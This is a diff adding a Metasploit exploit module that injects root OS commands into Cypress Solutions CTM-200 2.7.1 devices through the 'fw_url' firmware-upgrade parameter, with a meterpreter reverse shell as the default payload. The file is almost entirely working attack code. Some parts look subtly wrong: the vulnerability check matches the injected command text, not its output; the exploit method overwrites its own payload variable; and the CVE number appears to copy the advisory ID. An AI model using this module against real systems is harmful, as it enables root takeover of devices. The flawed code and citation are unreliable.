Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

modules/exploits/linux/http/cypress_ctm200_command_injection.rb

@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'uri'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection',
+        'Description'    => %q{
+          This module exploits a command injection vulnerability in the Cypress Solutions CTM-200 version 2.7.1.
+          By injecting commands via the `fw_url` POST parameter in the `ctm-config-upgrade.sh` script, 
+          an attacker can execute arbitrary commands as the root user.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         => 
+          [
+            'Berk Dusunur'   # Metasploit Module Author
+          ], 
+        'References'     => [
+          ['CVE', '2021-5687'],
+          ['URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php'],
+          ['URL', 'https://www.exploit-db.com/exploits/50408']
+        ],
+        'Privileged'     => true,
+        'Payload'        => {
+          'Space'       => 2048,
+          'BadChars'    => ''
+        },
+        'Platform'       => ['unix'],
+        'Arch'           => [ARCH_CMD],
+        'Targets'        => [['Automatic', {}]],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => '2021-09-21',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the vulnerable application', '/cgi-bin/webif/ctm-config-upgrade.sh']),
+        OptString.new('RHOST', [true, 'The target address']),
+        OptString.new('LHOST', [true, 'The local host for reverse shell']),
+        OptString.new('LPORT', [true, 'The local port for reverse shell'])
+      ]
+    )
+  end
+
+  def check
+    # Generate a random string to use in our payload
+    unique_string = "echo '#{Rex::Text.rand_text_alphanumeric(10..15)}'"
+
+    # Construct the payload with the unique_string
+    payload = "`#{unique_string}`"
+
+    # Prepare the POST request to test the vulnerability
+    data = {
+      'submit' => '1',
+      'upgradefile' => '',
+      'fw_url' => payload,
+      'install_fw_url' => 'Start Firmware Upgrade from URL',
+      'pkgurl' => ''
+    }
+
+    # Send the POST request to the target
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'vars_post' => data
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    # Check if the random string is in the response body
+    if res.code == 200 && res.body.include?(unique_string)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    payload = "#{payload.encoded}"
+    data = {
+      'submit' => '1',
+      'upgradefile' => '',
+      'fw_url' => payload,
+      'install_fw_url' => 'Start Firmware Upgrade from URL',
+      'pkgurl' => ''
+    }
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'vars_post' => data,
+      'rport'     => rport
+    })
+
+    if res && res.code == 200
+      print_good('Exploit sent successfully. Listening meterpreter shell')
+    else
+      print_error('Exploit failed. Target may not be vulnerable.')
+    end
+  end
+end
+